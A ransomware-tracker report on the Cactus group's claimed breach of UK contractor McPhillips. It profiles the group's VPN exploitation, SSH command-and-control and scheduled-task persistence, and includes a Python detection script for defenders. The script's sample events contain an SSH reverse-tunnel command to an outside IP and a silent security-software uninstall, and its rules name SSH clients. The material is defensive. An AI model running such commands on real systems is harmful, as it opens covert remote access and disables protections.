McPhillips Construction Faces Major Cactus Ransomware Breach

Incident Date:

September 3, 2024

Overview

Victim

McPhillips

Attacker

Cactus

Location

Telford, United Kingdom

First Reported

September 3, 2024

McPhillips Construction Company Hit by Cactus Ransomware Attack

McPhillips (Wellington) Limited, a prominent civil engineering and building contractor based in Telford, Shropshire, has become the latest victim of a ransomware attack attributed to the Cactus ransomware group. According to the group's leak-site listing, approximately 1.2TB of data was exfiltrated, including personally identifiable information (PII) of customers, detailed engineering drawings, project plans, employee and executive personal data, financial documents, contracts, and corporate correspondence.

About McPhillips

Founded in 1963, McPhillips (Wellington) Limited has established a strong reputation for delivering high-quality construction solutions to both public and private sector clients across the Midlands, Northwest England, and Mid & North Wales. The company specializes in a wide range of services, including new builds, refurbishments, and various infrastructure projects such as roads, highways, bridges, drainage systems, and earthworks. With a workforce of over 280 employees, McPhillips emphasizes local employment, with 92% of its personnel residing within 20 miles of its headquarters.

Attack Overview

The Cactus ransomware group has claimed responsibility for the attack on McPhillips via its dark web leak site. The group states that it exfiltrated a large volume of data, but so far has published less than 1% of it as proof of the breach. The published sample indicates that McPhillips works with clients in both the commercial and residential sectors. The company, which has an annual revenue of $40.8 million, is now dealing with the consequences of this significant cybersecurity incident.

About the Cactus Ransomware Group

First identified in March 2023, the Cactus ransomware group has quickly become a notable player in the ransomware landscape. Cactus targets commercial entities, gaining initial access primarily by exploiting vulnerabilities in VPN appliances. The group runs a double-extortion operation: it encrypts data and also threatens to leak the stolen copies if the ransom is not paid. Unusually, the Cactus encryptor is itself stored in encrypted form and only unpacked at run time, which limits what antivirus signatures on the file can catch and means detection has to rely on the surrounding behaviour (the access vector, persistence mechanisms and tooling described below) rather than on the payload alone.

Penetration and Impact

Cactus primarily gains access to networks by exploiting known vulnerabilities in VPN devices, notably those from Fortinet, and vulnerabilities in data analytics platforms such as Qlik Sense. The group is also known to use phishing and to buy stolen credentials on underground forums to obtain a foothold. Once inside a network, Cactus establishes command-and-control communications over SSH and uses Windows Scheduled Tasks to keep that access across reboots. It then scans the network to identify further targets in the compromised environment and commonly uninstalls or disables security software before deploying the encryptor. For defenders, the practical implications are to patch internet-facing VPN and Qlik Sense instances promptly, to require MFA on VPN logins so that purchased credentials alone are not enough, and to alert on newly created scheduled tasks and on SSH clients appearing on hosts that have no business running them.
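The paragraph above describes three behaviours a SOC can hunt for on Windows hosts: a scheduled task created for persistence, an SSH client used as the command-and-control channel, and security software being removed. The script below is an added example, not code from this page, from the tracker site, or from any Cactus analysis; it runs a few detection rules over constructed records modelled on Windows Security Event ID 4698 ("A scheduled task was created"). The field names, the list of SSH client binaries, the user-writable directory pattern and the treatment of `ssh -R`/`-N` and `msiexec /x /qn` as suspicious are the author's assumptions for illustration, not indicators published by the page.

```python
"""Hunt for scheduled-task persistence consistent with the TTPs above:
an SSH client launched as a task (reverse tunnel for C2), a task binary in a
user-writable directory, and a silent msiexec uninstall (security software
removal). All records are constructed for this example."""

import ntpath
import re

# Constructed records modelled on Event ID 4698, reduced to the fields used
# here (the real event carries the full task XML in the Task Content field).
SAMPLE_TASK_EVENTS = [
    {"host": "ws01", "subject": "CORP\\jdoe",
     "task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "command": "%windir%\\system32\\defrag.exe",
     "arguments": "-c -h -o -$"},
    {"host": "srv02", "subject": "CORP\\svc_backup",
     "task_name": "\\Updater",
     "command": "C:\\Users\\Public\\ssh.exe",
     "arguments": "-N -R 4444:127.0.0.1:3389 -i C:\\Users\\Public\\id_rsa "
                  "tunnel@198.51.100.7"},
    {"host": "srv02", "subject": "CORP\\svc_backup",
     "task_name": "\\Cleanup",
     "command": "C:\\Windows\\System32\\msiexec.exe",
     "arguments": "/x {ABCDEF12-3456-7890-ABCD-EF1234567890} /qn /norestart"},
    {"host": "ws03", "subject": "NT AUTHORITY\\SYSTEM",
     "task_name": "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start",
     "command": "C:\\Windows\\System32\\sc.exe",
     "arguments": "start wuauserv"},
]

# SSH clients commonly found on Windows hosts (assumed list, extend as needed).
SSH_CLIENTS = {"ssh.exe", "ssh", "plink.exe", "putty.exe", "kitty.exe"}

# Locations an unprivileged user or a dropped payload can write to (assumed).
USER_WRITABLE = re.compile(
    r"^(%(temp|tmp|appdata|localappdata|public)%|"
    r"[a-z]:\\(users|programdata|temp|windows\\temp)\\)",
    re.IGNORECASE)


def classify_task(event):
    """Return the reasons a task-creation event looks suspicious under these
    rules; an empty list means the task passed."""
    reasons = []
    command = event["command"].strip('"')
    tokens = event.get("arguments", "").split()
    lowered = [t.lower() for t in tokens]
    exe = ntpath.basename(command).lower()

    if exe in SSH_CLIENTS:
        reasons.append("ssh client launched by a scheduled task")
        # -R opens a reverse tunnel back to the remote host and -N runs no
        # remote command: a persistent C2 channel, not an admin session.
        if "-R" in tokens or "-N" in tokens:
            reasons.append("reverse tunnel / no-command flags (-R, -N)")
    if USER_WRITABLE.match(command):
        reasons.append("task binary lives in a user-writable directory")
    # A silent product uninstall driven by a task is how security software
    # tends to be removed without a console session.
    if exe == "msiexec.exe" and "/x" in lowered and \
            any(t in ("/qn", "/quiet") for t in lowered):
        reasons.append("silent msiexec uninstall (possible security software removal)")
    return reasons


def hunt_scheduled_tasks(events):
    """Apply classify_task to a batch of records and return one finding per
    suspicious task, in input order."""
    findings = []
    for event in events:
        reasons = classify_task(event)
        if reasons:
            findings.append({"host": event["host"], "task": event["task_name"],
                             "subject": event["subject"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in hunt_scheduled_tasks(SAMPLE_TASK_EVENTS):
        print(f"{finding['host']} {finding['task']} ({finding['subject']}): "
              + "; ".join(finding["reasons"]))
```

On the constructed sample the two `srv02` tasks are flagged and the two built-in Microsoft tasks are not. In production the same rules would be fed from the Task Content XML of 4698 events (or from Sysmon process-creation events for `schtasks.exe`), and the user-writable path rule should be paired with a known-good allowlist to keep the noise down.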

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing near real-time tracking of ransomware attacks, groups and their victims. Given how lucrative these operations have been for threat actors, ransomware has become one of the most widespread and financially and informationally damaging cyber threats to businesses and organizations today.

The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.